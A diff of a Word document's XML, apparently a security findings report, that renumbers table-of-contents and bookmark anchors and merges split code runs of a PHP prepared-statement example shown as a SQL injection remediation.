             </w:r>
             <w:r>
               <w:rPr>
@@ -2468,7 +2436,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451207" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453321" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2495,7 +2463,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451207 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453321 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2540,7 +2508,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451208" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453322" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2568,7 +2536,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451208 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453322 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2613,7 +2581,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451209" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453323" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2641,7 +2609,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451209 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453323 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2686,7 +2654,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451210" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453324" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2714,7 +2682,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451210 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453324 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2759,7 +2727,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451211" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453325" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2787,7 +2755,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451211 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453325 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2832,7 +2800,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451212" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453326" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2860,7 +2828,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451212 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453326 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2905,7 +2873,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451213" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453327" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2933,7 +2901,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451213 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453327 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2978,7 +2946,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451214" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453328" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3006,7 +2974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451214 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453328 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3051,7 +3019,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451215" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453329" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3078,7 +3046,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451215 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453329 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3123,7 +3091,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451216" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453330" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3151,7 +3119,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451216 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453330 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3196,7 +3164,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451217" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453331" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3224,7 +3192,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451217 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453331 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3269,7 +3237,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451218" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453332" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3297,7 +3265,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451218 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453332 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3342,7 +3310,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451219" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453333" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3370,7 +3338,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451219 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453333 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3415,7 +3383,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451220" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453334" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3443,7 +3411,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451220 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453334 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3488,7 +3456,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451221" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453335" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3516,7 +3484,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451221 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453335 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3561,7 +3529,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451222" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453336" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3589,7 +3557,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451222 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453336 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3634,7 +3602,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451223" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453337" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3676,7 +3644,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451223 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453337 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3721,7 +3689,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451224" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453338" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3749,7 +3717,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451224 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453338 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3794,7 +3762,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451225" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453339" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3822,7 +3790,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451225 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453339 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3867,7 +3835,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451226" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453340" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3895,7 +3863,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451226 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453340 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3940,7 +3908,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451227" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453341" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3968,7 +3936,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451227 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453341 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4013,7 +3981,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451228" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453342" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4041,7 +4009,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451228 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453342 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4086,7 +4054,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451229" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453343" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4114,7 +4082,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451229 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453343 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4159,7 +4127,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451230" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453344" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4187,7 +4155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451230 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453344 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4232,7 +4200,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451231" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453345" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4259,7 +4227,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451231 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453345 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4304,7 +4272,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451232" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453346" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4331,7 +4299,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451232 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453346 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4376,7 +4344,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451233" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453347" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4404,7 +4372,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451233 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453347 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4449,7 +4417,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451234" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453348" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4476,7 +4444,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451234 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453348 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4521,7 +4489,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451235" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453349" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4549,7 +4517,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451235 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453349 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4594,7 +4562,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451236" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453350" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4622,7 +4590,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451236 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453350 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4667,7 +4635,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71451237" w:history="1">
+          <w:hyperlink w:anchor="_Toc71453351" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4695,7 +4663,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71451237 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71453351 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4752,7 +4720,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71451189"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71453303"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -5373,7 +5341,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc71451190"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71453304"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -5391,7 +5359,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71451191"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71453305"/>
       <w:r>
         <w:t xml:space="preserve">Finding 1 - </w:t>
       </w:r>
@@ -5446,7 +5414,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc71451192"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71453306"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5777,7 +5745,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71451193"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71453307"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5937,7 +5905,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71451194"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71453308"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6026,7 +5994,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71451195"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71453309"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6122,7 +6090,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71451196"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71453310"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6225,7 +6193,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71451197"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71453311"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6312,7 +6280,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71451198"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71453312"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6417,43 +6385,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = $con-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>prepare(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6481,61 +6413,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>bind_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>param</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>"s", $_GET["username"]);</w:t>
+              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6563,43 +6441,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>execute(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;execute();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6627,43 +6469,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>stmt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>close(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>$stmt-&gt;close();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6734,7 +6540,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71451199"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71453313"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6784,7 +6590,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71451200"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71453314"/>
             <w:r>
